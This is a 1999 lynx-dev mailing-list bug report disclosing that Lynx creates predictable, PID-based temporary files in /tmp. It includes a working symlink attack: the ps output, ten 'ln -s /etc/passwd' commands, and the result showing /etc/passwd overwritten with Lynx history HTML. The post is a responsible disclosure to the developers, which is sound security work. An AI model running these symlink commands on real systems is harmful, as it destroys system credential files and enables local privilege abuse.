[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
lynx-dev Bug in lynx...
From: |
Juan Diego |
Subject: |
lynx-dev Bug in lynx... |
Date: |
Mon, 8 Feb 1999 22:58:43 +0500 (GMT) |
Hello....
I have found a bug in Lynx all versions...
lynx create temporary files in /tmp in this way....
L[num proc]-xTMP.html
where
[num proc] is the proc number in the machine
x is a number form 0 to 9
if i run lynx like any user, for example root we see this
earthworm:~$ ps
PID TTY STAT TIME COMMAND
91 1 SW 0:06 (bash)
94 4 S 0:05 -bash
95 5 SW 0:06 (bash)
3867 a3 S 0:00 pppd -detach defaultroute crtscts modem 192.168.2.6:
3870 3 SW 0:02 (ssh)
3894 4 T 0:00 lynx
3898 4 R 0:00 ps
then the files in /tmp created by lynx will be..
L3894-0TMP.html
L3894-1TMP.html
L3894-2TMP.html
L3894-3TMP.html
L3894-4TMP.html
L3894-5TMP.html
L3894-6TMP.html
L3894-7TMP.html
L3894-8TMP.html
L3894-9TMP.html
if i make a symlink
form any of it to any file in the system, for example....
earthworm:~$ cd /tmp
earthworm:/tmp$ ln -s /etc/passwd L3894-0TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-1TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-2TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-3TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-4TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-5TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-6TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-7TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-8TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-9TMP.html
and now root (in this example) try to download a file, or press the
backspace key to reach the history list, the file i have linked (in this
case /etc/passwd) will be replaced with it...
for example i got this in my system
earthworm:/tmp$ cat /etc/passwd
<head>
<title>Lynx History Page</title>
</head>
<body>
<h1>You have reached the History Page</h1>
<h2>Lynx Version 2.8rel2</h2>
<pre><em>You selected:</em>
<em>0</em>. <tab id=t0><a href="LYNXHIST:0">Internet Firewalls Frequently
Asked Questions</a>
<tab to=t0>file://localhost/root/firefaq.html
</pre>
</body>
like you see, the file is lost now...
i hope this can help you to improve lynx.
I'll post this tomorrow to the bugtraq list, but first the developers...
keep that great work with lynx, i really like it....
by..
Juan Diego
- lynx-dev Bug in lynx...,
Juan Diego <=